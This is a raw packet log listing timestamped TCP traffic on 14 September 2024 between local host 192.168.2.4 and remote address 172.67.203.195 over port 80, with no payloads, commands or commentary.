Sep 14, 2024 18:31:14.394973040 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.394999027 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.395173073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395184040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395194054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395204067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395214081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395222902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395232916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395232916 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.395243883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395255089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395262957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395277023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395279884 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.395287991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395298958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395308018 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.395308971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395318985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395329952 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.395370007 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.395504951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395514965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395524979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395536900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395546913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395556927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395566940 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.395567894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395579100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395590067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395590067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.395598888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395612001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.395612001 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.395629883 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.395672083 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.399209023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.399219036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.399235010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.399271965 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.399310112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.399319887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.399328947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.399338961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.399365902 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.399420023 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.399627924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.399689913 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.399733067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.399786949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.399838924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.399874926 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.399899006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.399930954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.399970055 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.400002956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.400034904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.400054932 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.400085926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.400118113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.400141954 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.400171995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.400206089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.400226116 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.400258064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.400294065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.400316954 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.453197002 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.455655098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.455718040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.455754042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.455789089 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.455820084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.455884933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.455900908 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.455950975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.455985069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456012964 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.456072092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456124067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456145048 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.456176043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456232071 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.456249952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456280947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456314087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456336021 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.456365108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456398964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456419945 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.456449986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456490040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456510067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.456537962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456571102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456590891 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.456623077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456655025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456676006 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.456707954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456739902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456763029 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.456793070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456825018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456845999 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.456875086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456906080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456927061 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.456957102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.456989050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.457016945 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.457050085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.457082987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.457104921 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.457135916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.457190037 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.481085062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.481234074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.481249094 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.481302023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.481343031 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.481374979 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.481421947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.481473923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.481508970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.481533051 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.481564045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.481601954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.481622934 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.481672049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.481722116 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.481745005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.481776953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.481811047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.481831074 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.481883049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.481914997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.481950045 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.481970072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482026100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482043028 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.482090950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482125044 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482161045 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.482178926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482212067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482233047 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.482269049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482300043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482325077 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.482353926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482404947 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.482429981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482460976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482511997 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.482532978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482584953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482618093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482637882 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.482667923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482703924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482723951 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.482753992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482786894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482809067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.482837915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482870102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482891083 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.482922077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482953072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.482973099 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.483002901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483032942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483057022 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.483082056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483114004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483135939 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.483165979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483197927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483218908 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.483249903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483280897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483303070 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.483333111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483365059 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483409882 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.483441114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483472109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483491898 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.483527899 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483560085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483581066 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.483611107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483644009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483664989 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.483695030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483726978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483747959 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.483778000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483809948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483829975 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.483863115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483895063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483916998 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.483947992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.483979940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.484000921 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.484031916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.484062910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.484082937 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.484113932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.484147072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.484168053 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.484199047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.484232903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.484253883 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.486083031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.486112118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.486164093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.486186981 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.486223936 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.486241102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.486274004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.486308098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.486329079 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.486361027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.486397982 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.486418009 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.486483097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.486542940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.486557007 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.486591101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.486623049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.486644030 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.486699104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.486732006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.486754894 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.486785889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.486816883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.486839056 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.486870050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.486927986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.486943007 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.486973047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.487005949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.487030983 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.487061024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.487095118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.487113953 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.531383991 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.542571068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.542608976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.542689085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.542741060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.542797089 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.542797089 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.542841911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.542895079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.542932034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.542954922 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.543008089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543040991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543062925 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.543116093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543165922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543189049 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.543220997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543252945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543275118 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.543304920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543335915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543355942 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.543414116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543448925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543469906 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.543503046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543535948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543556929 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.543587923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543622017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543642998 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.543673992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543703079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543728113 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.543757915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543791056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543812037 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.543843031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543875933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543899059 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.543930054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543963909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.543984890 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.544017076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.544071913 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.568850994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.568912029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.568929911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.568954945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.568970919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.568990946 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.569008112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.569036961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.569056988 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.569056988 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.569123983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.569159985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.569183111 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.569232941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.569287062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.569310904 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.569340944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.569391012 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.569417953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.569458008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.569492102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.569514036 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.569544077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.569577932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.569598913 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.569629908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.569679976 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.569703102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.569736958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.569772959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.569793940 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.569823980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.569856882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.569880009 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.569911003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.569943905 CEST	80	49738	172.67.203.195	192.168.2.4
